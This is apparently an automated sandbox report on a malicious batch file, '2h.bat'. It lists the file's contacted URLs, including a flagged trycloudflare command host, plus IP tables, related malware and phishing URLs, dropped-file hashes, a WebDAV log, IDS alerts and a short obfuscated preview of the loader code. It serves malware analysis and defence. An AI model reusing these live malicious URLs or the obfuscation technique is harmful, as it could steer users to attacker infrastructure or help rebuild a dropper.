          https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHIcmd.exe, 00000009.00000003.1581000924.0000017244489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1519588740.0000017244404000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244408000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244478000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244478000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579632176.000001724448B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1523273437.000001724448C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581186413.0000017244478000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579778025.000001724447A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581186413.0000017244489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580174687.000001724448B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244408000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578652526.00000187945B4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578721214.0000018794650000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580722369.000001332AE50000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580763388.000001332B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://supplier-murray-custody-treasures.trycloudflare.com/net.exe, 0000000C.00000002.1578721214.0000018794695000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000003.1536962933.00000187946AD000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578721214.00000187946C0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://supplier-murray-custody-treasures.trycloudflare.com//net.exe, 0000000C.00000002.1578721214.0000018794659000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.healyconsultants.com/wp-content/upl0Wcmd.exe, 00000009.00000003.1581240038.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.0000017244472000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244463000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfcmd.exe, 00000009.00000003.1581240038.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.0000017244409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244408000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581240038.0000017244407000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1582397233.00000172443DC000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244408000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578652526.00000187945B4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000C.00000002.1578721214.0000018794659000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580722369.000001332AE59000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000011.00000002.1580763388.000001332B0F4000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://supplier-murray-custody-treasures.trycloudflare.com/Knet.exe, 0000000C.00000002.1578721214.00000187946C0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfVkcmd.exe, 00000009.00000002.1582397233.0000017244409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1579656114.0000017244408000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1581240038.0000017244407000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1580886036.0000017244408000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfrcmd.exe, 00000009.00000002.1582397233.00000172443DC000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          162.159.134.42
          healyconsultants.comUnited States
          13335CLOUDFLARENETUSfalse
          142.251.40.196
          www.google.comUnited States
          15169GOOGLEUSfalse
          104.16.231.132
          supplier-murray-custody-treasures.trycloudflare.comUnited States
          13335CLOUDFLARENETUStrue
          IP
          192.168.2.4
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1647126
          Start date and time:2025-03-24 15:48:42 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 6s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:20
          Number of new started drivers analysed:1
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:2h.bat
          Detection:MAL
          Classification:mal76.spyw.winBAT@30/4@9/4
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .bat
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, rundll32.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 184.31.69.3, 23.203.176.221, 199.232.210.172, 142.250.81.227, 142.250.80.110, 172.217.165.142, 172.253.115.84, 142.251.32.110, 142.251.40.110, 142.250.80.78, 142.251.40.238, 142.251.40.206, 142.251.40.227, 142.251.32.99, 142.250.80.46, 4.175.87.197
          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          10:50:10API Interceptor20x Sleep call for process: powershell.exe modified
          10:50:14API Interceptor1x Sleep call for process: net.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          162.159.134.42http://www.hoppestad.no/Get hashmaliciousUnknownBrowse
          • www.hoppestad.no/
          JeouiaPf03mHSBH.exeGet hashmaliciousFormBookBrowse
          • www.goodneighbor.club/rk1u/?Srs=F12hDm1e4DcVWImHJ+2qK+It/RbJLRPuehC1dypgSVIG0HNIZQ44LV2EHRnZDsdrBZ/sqOYHya/GlclbNDRcdimcV6EHMYCTSyL+JOmQWa2hH4hFNXMeP+g=&FX=9v8XFZ
          Hesap_Hareketleri_20-07-2024.exeGet hashmaliciousFormBookBrowse
          • www.goodneighbor.club/ua6w/?mt=JRT0JH&WRsp6Vo=VguSblgGE2gr11H1Oz6h6PWd6leymQOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXMKet7xpBLnDRm6RCyc0okkK0F26Usou9s5dt62QO+Z5203j3h16PZUV7
          Inquiry files v2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • www.goodneighbor.club/qt04/
          nK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • www.goodneighbor.club/qt04/
          Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • www.goodneighbor.club/arws/
          CC-CREDIT CARD-itineraries.exeGet hashmaliciousFormBookBrowse
          • www.goodneighbor.club/ua6w/?L0WX3=VguSblgGE2gr11HyBT7GooCC0H7LwBOovKLAJAP7pFJ8CEff3rcgEuyXtoztwl+D0WsHUExksuBetSe4yiwXPO2P1jxDbVWq76NrnMwukHi5CRjf6Y7B46k=&_4B=Rxm4iVs
          http://heritageconsultants.comGet hashmaliciousUnknownBrowse
          • heritageconsultants.com/
          http://www.heritageconsultants.com/Get hashmaliciousUnknownBrowse
          • www.heritageconsultants.com/
          http://www.standardmediaindex.comGet hashmaliciousUnknownBrowse
          • www.standardmediaindex.com/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUSrIMG523000010722100013267543polyhalogen.batGet hashmaliciousRemcos, GuLoaderBrowse
          • 172.67.176.19
          http://aysar-osman.deGet hashmaliciousUnknownBrowse
          • 172.67.220.67
          FT-51050458.exeGet hashmaliciousFormBookBrowse
          • 172.67.199.251
          RemittanceVO23081100084673.jsGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          Arma Ferro - RFQ 987653411.exeGet hashmaliciousFormBookBrowse
          • 104.21.80.1
          YourToDo.svgGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          DETAILS_&_INVOICES.exeGet hashmaliciousFormBookBrowse
          • 104.21.4.181
          payment slip$34566.exeGet hashmaliciousFormBookBrowse
          • 104.21.96.1
          DHL_AWB#907853880944_pdf.exeGet hashmaliciousFormBookBrowse
          • 104.21.45.179
          payment copy $67548.exeGet hashmaliciousSnake KeyloggerBrowse
          • 104.21.64.1
          CLOUDFLARENETUSrIMG523000010722100013267543polyhalogen.batGet hashmaliciousRemcos, GuLoaderBrowse
          • 172.67.176.19
          http://aysar-osman.deGet hashmaliciousUnknownBrowse
          • 172.67.220.67
          FT-51050458.exeGet hashmaliciousFormBookBrowse
          • 172.67.199.251
          RemittanceVO23081100084673.jsGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          Arma Ferro - RFQ 987653411.exeGet hashmaliciousFormBookBrowse
          • 104.21.80.1
          YourToDo.svgGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          DETAILS_&_INVOICES.exeGet hashmaliciousFormBookBrowse
          • 104.21.4.181
          payment slip$34566.exeGet hashmaliciousFormBookBrowse
          • 104.21.96.1
          DHL_AWB#907853880944_pdf.exeGet hashmaliciousFormBookBrowse
          • 104.21.45.179
          payment copy $67548.exeGet hashmaliciousSnake KeyloggerBrowse
          • 104.21.64.1
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          28a2c9bd18a11de089ef85a160da29e4https://genee088.activehosted.com/box.php?nl=3&c=5&m=7&s=8d2d537642fe0bc0e87378e9173bb2b4&funcml=unsub2&luha=1Get hashmaliciousHTMLPhisherBrowse
          • 104.16.231.132
          https://email.double.serviceautopilot.com/c/eJwEwL1OwzAQAOCnsTdbzvl_8MAS2JAoA2Lzz51iKY2jJC3q2_PVcd_z9uot5UK-WFKi4GSFiY5EAFWEdlYF02LB4HlL5CIExzFN3oDTJnjP8Z772lsqlANNUQtrIwnjghJBoRfktVaVCjpQfEktUjYRa4nkA-VGudoCVldXLARneE-gwCoNoOJktJc2EgWTQfmChZxhRrXxKCvKE49nr5gf19j7Oi5Zx52vabmu_WT6jcHMYP79kdvyej3255_Ek8Hcbx9fn9ttbO_jm8HMj1SXo5_X2Bc8ZF7XvDGjjv0Y8sK68GeC_wAAAP__35laBgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
          • 104.16.231.132
          http://172.64.80.1Get hashmaliciousUnknownBrowse
          • 104.16.231.132
          https://web-login.malwarebouncer.com/XU3V1d0d4S1BOQnluanhNMjlRRHMza3BabytyWnlFclJrbjczaXgxL284dUxGbTdiQjc5aS9wYjZJS0tWcmNLVHhmSEdaM2N5Y0M0dHg4djVpOEhxNDdKK3VXNDNtY2d3eWRmYVJ5dXZaZlUzMTNNa1VyN2dzZmtHM3BvUWdkLzRuaWZuMGt6QWdsRzJBRXN3cjQ4c2RNb1lZVXIvb0x2cVVTYjI2bGVMVnE5dFErN0I1Y2dHMksrWlpUN3Rac3IwUjVFRHRBUzJvQ3VtcysxWTQvWVFMOUlnaStjPS0tSjQwQVBVR2czWWNVRnBTQS0tR1h2dHBheXVGSFVGQ2QvZUY3T3BKQT09?cid=2431845786Get hashmaliciousKnowBe4Browse
          • 104.16.231.132
          https://beekbyanna.formstack.com/forms/infoGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          http://clyy.981169.mdduel.com/rd/4tdTZC5863sQaD697esgeamuxmo320SZLLRUMDGAWEOWN3075INMB39155M12Get hashmaliciousUnknownBrowse
          • 104.16.231.132
          http://xml-v4.srvqck9.comGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          Enquiry-Dubai.jsGet hashmaliciousAgentTeslaBrowse
          • 104.16.231.132
          PD4OaBeAiY.exeGet hashmaliciousDanaBotBrowse
          • 104.16.231.132
          1D9RNWJNQB.exeGet hashmaliciousLummaC StealerBrowse
          • 104.16.231.132
          a0e9f5d64349fb13191bc781f81f42e1PRE#U00c7O - RFQ 674441-76450.xla.xlsxGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          Medical GmbH Order.xlsGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          PURCHASE ORDER - PO#267759.xlam.xlsxGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          Medical GmbH Order.xlsGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          Quotation.xlsGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          Quotation.xlsGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          USOE43wtyO.exeGet hashmaliciousDarkVision RatBrowse
          • 104.16.231.132
          HTu5eF4VeI.exeGet hashmaliciousDarkVision RatBrowse
          • 104.16.231.132
          ENQUIRY - RFQ 674441-76450.xla.xlsxGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          ENQUIRY - RFQ 674441-76450.xla.xlsxGet hashmaliciousUnknownBrowse
          • 104.16.231.132
          No context
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:NlllulLzc:NllU
          MD5:D0D8DA475C24D98797D589D2BD9D83F9
          SHA1:337DF4C8E968553F7845124876752AB668DC4038
          SHA-256:557DD96F04E44166641933316B033DEC24AC0E5C7567D6DB1814CB821E026C0B
          SHA-512:BE4E5C4551F8FF22349280446B6EBD3E4E6D88820B8F944962825A83259CFE6DD5BB24517C585F31E20EA6B3BD4F60A0ED94FCF89A95F3B881D61C4788C616F0
          Malicious:false
          Reputation:low
          Preview:@...e...................................u............@..........
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\cmd.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):383
          Entropy (8bit):4.990570039466986
          Encrypted:false
          SSDEEP:6:9imM05yFt7gvVtNGWF0953NZIKCe97wyLVtytsRoJakSAsRoJSFzb7K6TwRt05py:9D+uN2953N4eRHTSbaR42v7K6TwQy
          MD5:720B2F339146F7AB20C96B03C18506AA
          SHA1:5D0BCCC86CBAC5709DAB593702F199A4DBDB69F3
          SHA-256:176F08D758A2F2594561FFF547D119B2523E25944FCCFD007925F3B1CA0D807D
          SHA-512:89BF74D350ABD3D959BE7549EFA1337931DCF107297BDD4962FA55ACBB1FD9E9C30FBD5BED356EB8AFA55DFE71FE998132123851E3B7422C7BADEAA8F3F2C2A1
          Malicious:false
          Preview:[LOG] Script started at 24/03/2025 10:50:13.48 ..[INFO] Attempting to connect to WebDAV... ..System error 53 has occurred.....The network path was not found.....[ERROR] Failed to connect to WebDAV. Error code: 2 ..The system cannot find the drive specified...The system cannot find the path specified... 0 file(s) copied...[INFO] Script completed at 24/03/2025 10:50:19.29. ..
          File type:Unicode text, UTF-16, little-endian text, with very long lines (20908), with no line terminators
          Entropy (8bit):4.396185823482831
          TrID:
          • Text - UTF-16 (LE) encoded (2002/1) 66.67%
          • MP3 audio (1001/1) 33.33%
          File name:2h.bat
          File size:41'819 bytes
          MD5:0110fbc81a42c9376f10dbe604491f77
          SHA1:daf5f87aea0e57749d2951014d3dfdee9b57fa30
          SHA256:ae8c6e7884ebe53f38a11df2b90c84bad4b4fa192dd361a58dc33db4fddb33d0
          SHA512:354bc44e02daa21f2659bc6f4c996478663cf0ba2b8ef6d5cd2422fc84cf2e4475592f89bf8d6b73e9f06e4444a2307b81f72fab247363846e8a4eec44d6c940
          SSDEEP:384:0TeaoxxRYVKwIjMkqPdP3FdAOWJZgLI1S2VZ282j8AHuKaAA7itGb0Ac4jDfp+IC:0TtOx5q41Brcary293oYwd7eRrOtoaL
          TLSH:8F13916C9BC30A8BB149904F93670C226DAFD43E7A6D308FAD97797E07D5208D12729D
          File Content Preview:..&@cls&@set "...=EVertGYjRF6hZgin@HfMXAuQ0ol5y1vkL7w94PNJ8IDOpWUsSTBKCazc3xdmbq 2".%...:~16,1%%...:~47,1%%...:~2,1%%...:~4,1%%....r.M%%...:~62,1%"..%...:~23,1%%...:~53,1%%...:~57,1%=%...:~55,1%%...:~0,1%%...:~20,1%%...:~8,1%%...:~14,1%%...:~32,1%%...:~46
          Icon Hash:9686878b929a9886

          Download Network PCAP: filteredfull

          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2025-03-24T15:50:15.149265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449722104.16.231.132443TCP
          2025-03-24T15:50:15.942803+01001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.449722104.16.231.132443TCP
          2025-03-24T15:50:20.162097+01001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.449733104.16.231.132443TCP
          • Total Packets: 78
          • 443 (HTTPS)
          • 80 (HTTP)
          • 53 (DNS)
          TimestampSource PortDest PortSource IPDest IP
          Mar 24, 2025 15:49:44.519855976 CET49671443192.168.2.4204.79.197.203
          Mar 24, 2025 15:49:48.755011082 CET49678443192.168.2.420.189.173.27
          Mar 24, 2025 15:49:49.066737890 CET49678443192.168.2.420.189.173.27
          Mar 24, 2025 15:49:49.332431078 CET49671443192.168.2.4204.79.197.203
          Mar 24, 2025 15:49:49.676116943 CET49678443192.168.2.420.189.173.27
          Mar 24, 2025 15:49:50.879235029 CET49678443192.168.2.420.189.173.27
          Mar 24, 2025 15:49:52.957401037 CET49680443192.168.2.4204.79.197.222
          Mar 24, 2025 15:49:53.285506010 CET49678443192.168.2.420.189.173.27
          Mar 24, 2025 15:49:53.473007917 CET4968180192.168.2.42.17.190.73
          Mar 24, 2025 15:49:58.098001003 CET49678443192.168.2.420.189.173.27
          Mar 24, 2025 15:49:58.941770077 CET49671443192.168.2.4204.79.197.203
          Mar 24, 2025 15:50:02.080573082 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.080921888 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.081037045 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.175426006 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.175793886 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.175810099 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.176711082 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.176750898 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.176770926 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.176809072 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.177586079 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.180687904 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.180713892 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.180747032 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.180784941 CET49710443192.168.2.4204.79.197.222
          Mar 24, 2025 15:50:02.271159887 CET44349710204.79.197.222192.168.2.4
          Mar 24, 2025 15:50:02.510927916 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:50:02.608783960 CET8049719142.250.64.99192.168.2.4
          Mar 24, 2025 15:50:02.609493971 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:50:02.610291004 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:50:02.706173897 CET8049719142.250.64.99192.168.2.4
          Mar 24, 2025 15:50:02.708606005 CET8049719142.250.64.99192.168.2.4
          Mar 24, 2025 15:50:02.754381895 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:50:02.988513947 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:50:03.087635040 CET8049719142.250.64.99192.168.2.4
          Mar 24, 2025 15:50:03.129302025 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:50:07.707405090 CET49678443192.168.2.420.189.173.27
          Mar 24, 2025 15:50:14.919277906 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:14.919329882 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:14.919397116 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:14.921341896 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:14.921365976 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:15.148622036 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:15.149265051 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:15.380659103 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:15.380685091 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:15.382246017 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:15.430111885 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:15.639457941 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:15.680332899 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:15.886872053 CET49725443192.168.2.4162.159.134.42
          Mar 24, 2025 15:50:15.886908054 CET44349725162.159.134.42192.168.2.4
          Mar 24, 2025 15:50:15.886981964 CET49725443192.168.2.4162.159.134.42
          Mar 24, 2025 15:50:15.889715910 CET49725443192.168.2.4162.159.134.42
          Mar 24, 2025 15:50:15.889735937 CET44349725162.159.134.42192.168.2.4
          Mar 24, 2025 15:50:15.942809105 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:15.942934036 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:15.943092108 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:16.003002882 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:16.003036022 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:16.003048897 CET49722443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:16.003067970 CET44349722104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:16.111699104 CET44349725162.159.134.42192.168.2.4
          Mar 24, 2025 15:50:16.111771107 CET49725443192.168.2.4162.159.134.42
          Mar 24, 2025 15:50:16.118200064 CET49725443192.168.2.4162.159.134.42
          Mar 24, 2025 15:50:16.118222952 CET44349725162.159.134.42192.168.2.4
          Mar 24, 2025 15:50:16.118496895 CET44349725162.159.134.42192.168.2.4
          Mar 24, 2025 15:50:16.132512093 CET49725443192.168.2.4162.159.134.42
          Mar 24, 2025 15:50:16.132587910 CET44349725162.159.134.42192.168.2.4
          Mar 24, 2025 15:50:16.132644892 CET49725443192.168.2.4162.159.134.42
          Mar 24, 2025 15:50:19.632323980 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:19.632370949 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:19.632441998 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:19.633516073 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:19.633532047 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:19.843959093 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:19.844042063 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:19.845455885 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:19.845467091 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:19.845721006 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:19.878720999 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:19.924325943 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:20.003180027 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:20.003216028 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:50:20.003330946 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:20.003472090 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:20.003484011 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:50:20.162094116 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:20.162256956 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:20.162365913 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:20.162600994 CET49733443192.168.2.4104.16.231.132
          Mar 24, 2025 15:50:20.162619114 CET44349733104.16.231.132192.168.2.4
          Mar 24, 2025 15:50:20.215492010 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:50:20.215562105 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:20.216908932 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:20.216922045 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:50:20.217174053 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:50:20.269697905 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:30.219425917 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:50:30.219480038 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:50:30.219575882 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:31.802458048 CET49734443192.168.2.4142.251.40.196
          Mar 24, 2025 15:50:31.802505016 CET44349734142.251.40.196192.168.2.4
          Mar 24, 2025 15:51:03.426799059 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:51:03.520003080 CET8049719142.250.64.99192.168.2.4
          Mar 24, 2025 15:51:03.520157099 CET4971980192.168.2.4142.250.64.99
          Mar 24, 2025 15:51:19.954225063 CET49740443192.168.2.4142.251.40.196
